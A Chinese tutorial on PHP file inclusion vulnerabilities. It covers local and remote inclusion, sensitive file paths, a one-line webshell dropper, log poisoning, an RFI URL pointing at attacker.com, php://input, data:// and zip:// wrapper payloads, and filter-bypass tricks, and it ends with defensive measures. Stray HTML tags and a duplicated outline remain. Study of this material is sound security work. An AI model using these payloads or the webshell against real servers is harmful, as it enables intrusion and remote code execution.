文件包含漏洞从入门到精通<\/h1>

一、文件包含漏洞概述<\/h2>

1.1 漏洞定义<\/h3>
文件包含漏洞是一种常见的Web安全漏洞，由于开发人员为了提高代码复用性和模块化，将可重复使用的函数或代码段写入单个文件，在需要时直接调用这些文件。当开发人员未对用户输入的参数进行正确过滤和检查时，攻击者可以控制包含文件的参数值，从而访问敏感文件或执行恶意代码。<\/p>

1.2 相关函数<\/h3>

PHP中常见的文件包含函数有：<\/p>

include()<\/code>：包含并运行指定文件，文件不存在发出警告，脚本继续执行<\/li>
require()<\/code>：与include类似，但处理失败时报错，脚本终止<\/li>
include_once()<\/code>：与include类似，但确保文件只被包含一次<\/li>

require_once()<\/code>：与require相似，但确保文件只被包含一次<\/li>
<\/ul>
二、漏洞分类<\/h2>
2.1 本地文件包含(LFI - Local File Inclusion)<\/h3>
攻击者可以读取服务器上的任意文件，包括：<\/p>

敏感配置文件<\/li>
密码文件<\/li>
日志文件等<\/li>
<\/ul>
2.2 远程文件包含(RFI - Remote File Inclusion)<\/h3>
攻击者可以访问远程服务器上的文件或者下载、执行恶意代码<\/p>
三、本地文件包含漏洞利用<\/h2>
3.1 文件读取<\/h3>
通过包含不存在的文件测试，可能暴露绝对路径：<\/p>
if<\/span>( isset<\/span>( $file ) ) 
<\/span><\/span>    include<\/span>( $file ); 
<\/span><\/span>else<\/span> {
<\/span><\/span>    header<\/span>( 'Location:?page=include.php'<\/span> ); 
<\/span><\/span>    exit<\/span>; 
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>常见敏感文件路径：<\/p>

\/etc\/passwd<\/code>：存储用户账号信息<\/li>
\/etc\/shadow<\/code>：存储用户密码的哈希值<\/li>
Apache配置文件：

CentOS: \/etc\/httpd\/conf\/httpd.conf<\/code><\/li>
Ubuntu: \/etc\/apache2\/apache2.conf<\/code><\/li>
<\/ul>
<\/li>
Apache日志文件：

CentOS: \/var\/log\/httpd\/access_log<\/code><\/li>
Ubuntu: \/var\/log\/apache2\/access.log<\/code><\/li>
<\/ul>
<\/li>
Nginx配置文件：\/etc\/nginx\/nginx.conf<\/code><\/li>
Nginx日志文件：\/var\/log\/nginx\/access.log<\/code><\/li>
<\/ul>
3.2 文件执行<\/h3>
通过上传包含PHP代码的文件并包含执行：<\/p>

上传图片木马（如shell.jpg）：<\/li>
<\/ol>
<?<\/span>PHP<\/span> fputs<\/span>(fopen<\/span>('shell.php'<\/span>,'w'<\/span>),'<?php eval($_POST[pass]);?>'<\/span>);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
包含该文件执行PHP代码<\/li>
使用蚁剑等工具连接生成的shell.php<\/li>
<\/ol>
3.3 配合日志文件getshell<\/h3>

访问不存在的路径，使请求被记录到日志<\/li>
查看日志文件（如\/var\/log\/nginx\/access.log<\/code>）<\/li>
在User-Agent中插入一句话木马<\/li>
包含日志文件执行代码<\/li>
<\/ol>
四、远程文件包含(RFI)利用<\/h2>
4.1 基本利用<\/h3>
直接包含远程服务器上的恶意PHP文件：<\/p>
http:\/\/victim.com\/vulnerabilities\/fi\/?page=http:\/\/attacker.com\/malicious.php
<\/code><\/pre>
4.2 搭建简易HTTP服务<\/h3>
使用Python快速搭建HTTP服务：<\/p>
python -m http.server 8000<\/span>
<\/span><\/span><\/code><\/pre>五、伪协议利用<\/h2>
5.1 file:\/\/<\/h3>
读取本地文件：<\/p>
file:\/\/[文件的绝对路径和文件名]
<\/code><\/pre>
5.2 php:\/\/filter<\/h3>
用于数据流筛选过滤，常用于读取文件内容：<\/p>
php:\/\/filter\/read=convert.base64-encode\/resource=文件路径
<\/code><\/pre>
示例：<\/p>
http:\/\/victim.com\/fi\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=\/etc\/passwd
<\/code><\/pre>
5.3 php:\/\/input<\/h3>
访问请求的原始数据，可执行POST提交的PHP代码：<\/p>
http:\/\/victim.com\/fi\/?page=php:\/\/input
<\/code><\/pre>
POST数据：<\/p>
<?<\/span>php<\/span> system<\/span>('id'<\/span>);?><\/span>
<\/span><\/span><\/span><\/code><\/pre>5.4 data:\/\/<\/h3>
执行PHP代码：<\/p>
data:\/\/text\/plain,<?php phpinfo();?>
<\/code><\/pre>
或Base64编码：<\/p>
data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
<\/code><\/pre>
5.5 zip:\/\/ & bzip2:\/\/ & zlib:\/\/<\/h3>
访问压缩文件中的子文件：<\/p>

压缩phpinfo.txt为phpinfo.zip<\/li>
重命名为phpinfo.jpg并上传<\/li>
包含：<\/li>
<\/ol>
zip:\/\/\/path\/to\/phpinfo.jpg%23phpinfo.txt
<\/code><\/pre>
六、绕过技术<\/h2>
6.1 大小写绕过<\/h3>
当过滤关键词如"http:\/\/"时：<\/p>
HtTp:\/\/www.baidu.com
<\/code><\/pre>
6.2 双写绕过<\/h3>
当过滤关键词时：<\/p>
hthttp:\/\/tp:\/\/www.baidu.com
<\/code><\/pre>
6.3 伪协议绕过<\/h3>
当使用fnmatch函数检查参数开头时：<\/p>
file:\/\/\/etc\/passwd
<\/code><\/pre>
七、防御措施<\/h2>

避免使用用户输入作为文件包含参数<\/li>
如需使用，应严格过滤输入：

检查包含文件是否在白名单中<\/li>
过滤..\/<\/code>等目录遍历字符<\/li>
禁用危险伪协议<\/li>
<\/ul>
<\/li>
设置open_basedir<\/code>限制文件访问范围<\/li>
关闭不必要的PHP配置选项，如allow_url_fopen<\/code>和allow_url_include<\/code><\/li>
<\/ol>
八、总结<\/h2>
文件包含漏洞危害严重，可导致敏感信息泄露、系统命令执行等后果。开发人员应重视输入验证，安全人员测试时应全面考虑各种利用方式，包括本地文件包含、远程文件包含、各种伪协议利用以及可能的绕过技术。<\/p>

文件包含漏洞从入门到精通<\/h1>

一、文件包含漏洞概述<\/h2>

二、漏洞分类<\/h2>

2.2 远程文件包含(RFI - Remote File Inclusion)<\/h3> 攻击者可以访问远程服务器上的文件或者下载、执行恶意代码<\/p>

三、本地文件包含漏洞利用<\/h2>

四、远程文件包含(RFI)利用<\/h2>

五、伪协议利用<\/h2>

六、绕过技术<\/h2>

2.2 远程文件包含(RFI - Remote File Inclusion)<\/h3>
攻击者可以访问远程服务器上的文件或者下载、执行恶意代码<\/p>